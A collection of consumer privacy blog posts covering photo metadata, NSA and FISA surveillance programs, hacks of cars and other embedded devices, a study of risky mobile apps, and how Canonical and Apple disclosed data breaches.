Your video files contain similar metadata elements. Using metadata associated with your photos and videos, they can tell a lot about you without viewing the actual video or photo. Note: social networking websites usually add more metadata to your photographs (and videos) that you upload and store on their service. Why? This makes the data they sell about you more valuable to advertising networks and analytic/tracking companies.

Earlier this year, the International Press Telecommunications Council (IPTC) released the results of a study of images used by social networking websites. Most of those sites edit and delete photographers' metadata from images they host. The IPTC studied 15 social networking websites, and what happened to image metadata during both uploads and downloads. Some of the social networking websites studied: Dropbox, Facebook, Flickr, Google+, Instagram, Pinterest, Twitter, and Tumblr. The IPTC found:

"... Facebook and Flickr are some of the worst offenders, with most of the metadata removed from the original files uploaded. Twitter has also been found to remove Exif and IPTC metadata from its files. Google+, however, passed all of IPTC's tests with flying colours,"

Read the details about the IPTC metadata study. So, the practices by these websites intentionally affects the quality and integrity of your photographs by changing the metadata attached. I'll bet you didn't know that. I'll bet this photo/video metadata tracking gives you a whole, new view of social networking sites.

After reading all of this, several things should be clear. First, metadata is very informative and valuable. It is not benign. Experts have found that metadata is more revealing about you than the content of your telephone conversations. How? By combining your online activity, phone calls, and real-world location. Example: you get a call from your doctor, and five minutes later you do a Google search for "ovarian cancer," and then click through to visit the WebMD website. Twenty minutes later, you call your spouse. After that, your smart phone's GPS history from the telephone company (or your debit card transaction history from your bank) reveals your location at your neighborhood pharmacy. They can easily infer what's happening, even though they did not listen to your actual telephone conversations.

Second, the collection of metadata does not make government surveillance programs any less intrusive. They can learn a lot about you by analyzing only the metadata associated with your online activity. With additional metadata supplied by social networking websites, they can easily learn a lot more.

So, when you hear corporate executives, pundits or politicians claim that there is no problem because they are only collecting metadata, you now know that is misleading and not entirely honest. So, when you hear corporate executives, pundits or politicians claim that there is no problem because they are not reading your email/text messages nor listening to your phone conversations, you now know that, too, is misleading and not entirely honest.

One way to maintain your privacy is to control who has access to the metadata associated with your online activity. To understand the extent of the problem, consumers must demand to know who collects, edits, deletes, saves, and shares (with whom) the metadata associated with your online activity.

I'll bet this gives you a new view of government surveillance programs. As you rush to use cloud services for convenient access by all of your mobile devices, you might pause and consider:

  1. What metadata is attached to the files you have stored in cloud services,
  2. Who controls, edits and deletes the metadata attached to those files,
  3. The companies and governments the cloud service shares your files' metadata with, and
  4. If the privacy and terms of use policies by your cloud service answers items #1 through #3.

Experts have warned that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues, as customers seek alternatives. Despite the claims of pro-surveillance politicians and government officials, broad surveillance of all citizens has its direct costs.

Were these pro-surveillance people so arrogant (or myopic) that they assumed there wouldn't be consequences to American businesses? Or do they just not care? One could make a good argument that this broad surveillance has jeopardized America's leadership in developing, utilizing, and innovating the Internet, as users look for substitutes to products and services by American Internet and high-tech companies. The surveillance has also damaged the trust by America's allies.


More Consequences, And Abuse, From Broad Government Surveillance Programs

National Security Agency logo There is a very interesting article at the C/Net website. Some selected, very interesting comments and questions:

"If you're a security researcher at a large cloud company, you have to include the NSA on your list of threats that you have to protect against..."

"The FBI has a unit now that does nothing but hack into people's computers, extract documents, control Webcams... The FBI's role as an offensive cyber actor significantly undermines their cause. How can an agency warn people about malware when it's using malware itself?"

"Even if [the NSA] stood up tomorrow and said that [they] have eliminated these programs... How could we believe them? How can we believe that anything they say is true?"

"The issue with balancing privacy and surveillance is that the wireless carriers are not interested in privacy..."

"Even if you trust the NSA 100 percent that they're going to use [your data] correctly... Do you trust that they're going to be able to keep it safe from hackers? What if somebody gets that database and posts it online?"

Speaking of correctly protecting and using the data collected (or not = abuse), Reuters reporters have uncovered a secret government program where data collected by the NSA supposedly about only non-U.S. citizens is used by several other government agencies (e.g., CIA, DHS, FBI, and IRS) to secretly prosecute American citizens:

“A secretive U.S. Drug Enforcement Administration unit is funneling information from intelligence intercepts, wiretaps, informants and a massive database of telephone records to authorities across the nation to help them launch criminal investigations of Americans... The undated documents show that federal agents are trained to "recreate" the investigative trail to effectively cover up where the information originated, a practice that some experts say violates a defendant's Constitutional right to a fair trial. If defendants don't know how an investigation began, they cannot know to ask to review potential sources of exculpatory evidence - information that could reveal entrapment, mistakes or biased witnesses.”

So, we now know that the Special Operations Division within the DEA uses data collected by the NSA.

And, experts warn that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues. Lost revenues equals lost J-O-B-S here in the USA. Is the Federal government and Congress ready to explain that? I think not.


Researchers Demonstrate That Products With Embedded Computers Can Be Hacked And Need Stronger Protections

With the digital revolution, computers are now a part of many products and items. Some of these things you are aware of. Others, you might not be aware of:

  • In June, a group of researchers, including students at the University of Texas at Austin, created fake GPS signals to steer an $80 million yacht off course. During this experiment, the yacht was sailing in international waters off the coast of Italy.
  • Funded by DARPA, engineers penetrated the systems in a Ford Excape to disable the car's brakes, engage the brakes at high speed, spoofed the GPS, disabled the power steering, and other nasty hacks. This was not adriverless car, but a standard-issue car built by Ford Motor Company.
  • Other hackers found vulnerabilities in digital television sets, which allowed hackers to remotely take over the camera in the devices

All of this hacking was done to highlight the vulnerabilities, and to encourage manufacturers to build better data security into their products. Forbes magazine reported:

"Practically every American carmaker now offers a cellular service or Wi-Fi network like General Motors’ OnStar, Toyota’s Safety Connect and Ford’s SYNC. Mobile-industry trade group the GSMA estimates revenue from wireless devices in cars at $2.5 billion today and projects that number will grow tenfold by 2025. Without better security it’s all potentially vulnerable, and automakers are remaining mum or downplaying the issue."

So, just like spammers current "spook" or create fake e-mail addresses, criminals and identity thieves can create fake GPS signals to fool any GPS-enabled mobile device. If engineers and researchers can do these nasty hacks, so too can real criminals and identity thieves.

When these types of hacks happen, there is no alarm or signal that the device is being or has been hacked.

The bottom line: a computer is a computer, regardless of the device or product that contains one. And, that computer (or WiFi server) can be hacked by criminals just like your laptop, desktop, tablet, and smart phone can be hacked. A wise consumer will:

  1. Understand before purchase the data security built into a manufacturer's product
  2. Read before a purchase the privacy policy that is included with the product
  3. After purchase, install and maintain any anti-virus software to protect the product

83% Of The Leading Mobile Apps Put Your Sensitive Personal Information At Risk

Appthority logo On July 30, Appthority released a report about the risks with mobile apps. The report including a study of the 400 leading apps across the Apple iOS and Google Android platforms. The study included 100 leading free apps and the 100 leading paid apps from both platforms.

Since there are more than a million apps in the Apple App Store and in Google Play, there is stiff competition among app developers. As a result, many app developers increase their revenues by selling mobile users' information to both advertising networks and analytic/tracking companies. Developers of both free and paid apps do this.

Key findings from the study:

"Overall, 83% of the most popular apps are associated with security risks and privacy issues.

iOS apps exhibited more risky behaviors than Android apps overall. 91% of iOS apps exhibit at least one risky behavior, as compared to 80% of Android apps.

95% of the top free apps and 78% of the top paid apps exhibited at least one risky behavior.

78% of the most popular free Android apps identify the user’s ID (UDID).

Even though Apple prohibits its developers from accessing the UDID, 6% of the tested iOS apps still do.

72% of the top free apps track for the user’s location, compared to 41% of paid apps.

Although paid apps already generate revenue when downloaded, 59% of paid iOS and 24% of paid Android apps still support in-app purchasing. Furthermore, 39% of paid iOS and 16% of paid Android apps still share data"

The UDID is a bonanza for companies, marketers, analytics/tracking companies, advertising networks, and any entity interested in tracking consumers. When matched with your 10-digit phone number and App Store account, the UDID is a powerful identification (and tracking) tool that allows the compilation of all data, usage, and information on a mobile device to a person: phone calls, email messages, photos, video, text messages, GPS position, phone book, web browser history, apps downloaded, music, movies, and more. That compilation is more extensive since many consumers now use multiple email addresses (e.g., work and personal) on a single mobile device.

While both types of apps expose you to risky behavior, the researchers found that free apps are riskier than paid apps:

"The biggest disparity between free and paid apps is location tracking. While 73% of free apps track for location, less than half of paid apps (41%) do the same. Free apps are also more likely than paid apps to use single sign-on (67%), share data with ad networks and analytics (51%), offer in-app purchasing (50%), identify the user or UDID (44%), access the address book or contact list (42%), and access the calendar (15%). Paid apps, on the other hand, aren’t as safe as one might think..."

So, using only paid apps is not a security solution for consumers. The researchers also found that Apple iOS apps exhibited more risky behavior than Android apps:

"... 91% of iOS apps exhibit at least one risky behavior, as compared to 80% of Android apps. Of the 200 iOS apps Appthority tested (100 free, 100 paid), 62% tracked for location, 56% used single sign-on, 59% offered in-app purchasing, 43% shared data with ad networks or analytics companies, 39% accessed the address book or contact list, and 20% accessed the calendar..."

So, assuming that Apple iOS apps are safe is not a good security solution for consumers. Many apps track your GPS location needlessly. That is, the app doesn't need your geo-location to operate, but it collects it anyway so the developer can sell more data to advertising networks and analytics/tracking companies. And the apps won't always tell you they are doing this:

"In some cases, developers are paid based on the amount of data they collect and share about users. Have you ever noticed an app that’s constantly running in the background (that really has no need to)? It’s possible that it’s tracking your location and sharing it with outside parties for advertising purposes. App developers will often ask for these types of permissions upfront, but unfortunately that’s not always the case; or, the language they use is intentionally deceptive."

Plus, these apps that constantly collect and report your geo-location will consume more of your valuable data plan minutes, since many telecommunications providers have eliminated the unlimited data plan option. Some of the companies that built the leading Apple iOS apps:

"Disney dominated the market share of popular iOS apps (10 apps), followed by Electronic Arts (5), Apple (4), George CL (4) and Rovio Entertainment (makers of Angry Birds) (4). There were 79 different developers in the top 100 paid iOS apps... From the top 100 free iOS apps, there were 81 different developers... "

Some of the companies that built the leading Android apps:

"... Electronic Arts led the pack (5 apps), followed by Disney (4), Gameloft (4), Google (4) and Chainfire (3). There were 88 different developers in the top 100 paid Android apps... With the top 100 free Android apps, there were 85 different developers..."

Most of these apps are games, followed by social networking apps, music apps, and utilities:

"... gaming apps exhibited more risky behaviors across all categories, with the exception of accessing the address book or contact list. More than twice as many gaming apps (68%) supported in-app purchasing, as compared to non-gaming apps. Also, interestingly enough, gaming apps and non-gaming apps showed the same level for location tracking (57%)... 56% used single sign-on, 51% shared data with analytics or ad networks, 43% identified the user (UDID), 27% accessed the address book or contact list, and 13% accessed the calendar..."

The complete report lists the apps studied by type (e.g., free, paid), by platform (e.g., Apple iOS, Android), and by name.

Since many consumers use their mobile devices for both work and personal activity, some IT departments might be tempted to block or ban gaming apps as a data security policy. The researchers advise against this, because not all gaming apps are risky, and not all  apps in other categories (e.g., social networking, music, utilities) are safe. Plus, most employees will resent and resist being told what apps they cannot download onto their personal devices.

While the Apple iOS platform seems safer than the Google Android platform, the Apple iOS apps are riskier. So, brand loyalty isn't necessarily a good data security strategy.

In my view, using mobile apps today is like the wild west frontier of the 1800s. Anything goes. Past studies have documented the lack of privacy policies with too many mobile apps. In some instances, class-action lawsuits have been a remedy to abuses for consumers.Some states' attorney generals have cracked down on apps that abuse consumers' sensitive personal data.

Download the complete App Reputation Report by Appthority.


The FISA Court, Justice Department, XKeyscore, And Your Online Passwords

Department of Justice logoThree related items in today's post. First, a Center For Democracy and Technology article discussed a newly disclosed letter that described the relationship between the FISA Court and the Department of Justice (DOJ). The relationship is closer than one might expect, and the letter documents how the two entities collaborate.

Before applying for surveillance under FISA Court rules, the Department of Justice:

"... sends a draft of the application for FISA surveillance to a clerk at the FISA Court; the FISA Court’s clerk sends back comments; DOJ sends another draft or a final application for a surveillance order; the FISA Court clerk prepares a bench memo on the application; and the FISA Court judge on duty decides whether to authorize the surveillance based on the application, bench memo and the government’s unopposed presentation at any hearing the judge may convene. As part of this process, FISA Court clerks and DOJ lawyers have conversations daily about FISA surveillance applications, and they get together for meetings approximately weekly depending on the caseload..."

Are the skills of the DOJ staff so weak that they need help from the FISA Court to write appropriate surveillance applications? Why this level of collaboration is troublesome:

"... in the criminal context, a specific person is wiretapped to obtain evidence about a specific crime, and whether that evidence was obtained lawfully and constitutionally is tested in a fully adversarial proceeding when that person is charged with the crime. There is no such after-the-fact check on FISA surveillance. Any adversarial testing of that surveillance has to occur up front, when the FISA Court is deciding whether to authorize it."

Given this cozy collaboration, it is no surprise that the FISA Court has rejected only 11 of 33,900 requests by the DOJ since 1979. That is a rejection rate of 0.03 percent, or 0.0003. That doesn't seem like oversight to me. That seems like a rubber stamp -- and a broken one, too.

Browse the number and type of DOJ applications and FISA approvals since 1979. Read part one about how the FISA Court undermines the public's trust.

Today's second item: several news outlets reported that the U.S. government has asked Internet firms to provide them with bulk users' passwords. Internet service providers (ISPs), social networking sites (e.g., Facebook), communications websites (e.g., Skype), online stores (e.g., Amazon), and websites usually store users' passwords in an encrypted format. By requesting this information, the government would be able to access private, confidential correspondence; or even log in and impersonate users:

"A Microsoft spokesperson would not say whether the company has received such requests from the government. But when asked whether Microsoft would divulge passwords, salts, or algorithms, the spokesperson replied: "No, we don't, and we can't see a circumstance in which we would provide it." Google also declined to disclose whether it had received requests for those types of data. But a spokesperson said the company has "never" turned over a user's encrypted password... A Yahoo spokeswoman would not say whether the company had received such requests... Apple, Facebook, AOL, Verizon, AT&T, Time Warner Cable, and Comcast did not respond to queries about whether they have received requests for users' passwords and how they would respond to them... The FBI declined to comment."

This is the government surveillance agencies (e.g., NSA, FBI) collecting information about everyone, and what everyone does online -- regardless of whether you have committed a crime or not. This troubles me greatly, and I hope that it troubles you, too. Just because you encrypt your online information, or use an online encryption service (e.g., VPN) does not make one suspicious. There are lots of reasons to encrypt your online activity. Example: it is wise data security to use a VPN and encrypt your online sessions when connected at a public WiFi hotspot. Example: a user experience and information architecture consultant, I have to protect my clients' sensitive assets.

This is not small government. This broad, encompassing data collection is an over-reach by our government: to collect all online data about everyone without limiting their data collection to people who have committed crimes, or to persons under suspicion of criminal activity with clearly articulated, valid, bounded, court approved orders.

Today's third item: the Guardian UK reported about another US government surveillance program:

"A top secret National Security Agency program allows analysts to search with no prior authorization through vast databases containing emails, online chats and the browsing histories of millions of individuals... The NSA boasts in training materials that the program, called XKeyscore, is its "widest-reaching" system for developing intelligence from the internet."

National Security Agency logo Reportedly, all an NSA analyst needs is a person's email address to search data collected by Xkeyscore:

"... training materials for XKeyscore detail how analysts can use it and other systems to mine enormous agency databases by filling in a simple on-screen form giving only a broad justification for the search. The request is not reviewed by a court or any NSA personnel before it is processed..."

This XKeyscore system seems ripe for abuse. Looking at all three items, we have a secret court, secret laws, secret processes, and secret operations. On top of all this secrecy, our elected officials in U.S. Congress knew about it, voted for it, and did not inform the public whom they took an oath to serve.

Overall, there are two over-arching issues:

  1. Trust
  2. 4th Amendment of the U.S. Constitution

It is impossible for "We, the People" to hold accountable a secret court with secret laws and secret processes. Also, lies break the public's trust. When a government fails to honestly, accurately, and fully inform the voting public (e.g., We, the People) about secret courts, laws, processes, and processes, it breaks the public's trust. Perhaps more importantly, a government can't simply ignore or walk away from the Fourth Amendment of the U.S. Constitution:

"The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized."

Write to your elected officials today. Learn more about government surveillance programs.


A Tale Of Two Data Breaches. Transparency Matters

Yesterday, Michael Lee has written a good ZDNet article contrasting the post-breach responses by two companies: Canonical and Apple. Both companies experienced data breaches, but responded to the breach in very different ways.

Canonical operates the Ubuntu Forums, and:

"In its latest announcement, Canonical broke down its understanding of how it believes it had been breached... with a moderator account used to post an announcement on the forum. The announcement itself is believed to have contained a cross-site scripting (XSS) attack, designed to steal the login session information from the victim's browser cookie. The compromised moderator account was then used to message three of the boards' administrators, allowing the attacker to hijack an administrator's login session. Once armed with the administrator's privileges, the attacker then inserted a "hook" in the vBulletin web-forum software to allow them to execute arbitrary code..."

Compare that to this:

"... Apple, in contrast, is still having difficulty in bringing its services back online after its Developer services suffered a security breach on the very same weekend. Despite stating that it was informing customers of the breach "in the spirit of transparency", it has not revealed any information on how the attackers attempted their intrusion. Initially, the company took down its developer centre for two days for no apparent reason, telling users that it was "undergoing maintenance for an extended period". Users later began to suspect foul play when they received unauthorised password reset emails. Apple has managed to bring more of its services back online today..."

Transparency matters and consumers expect open, honest, and direct communications.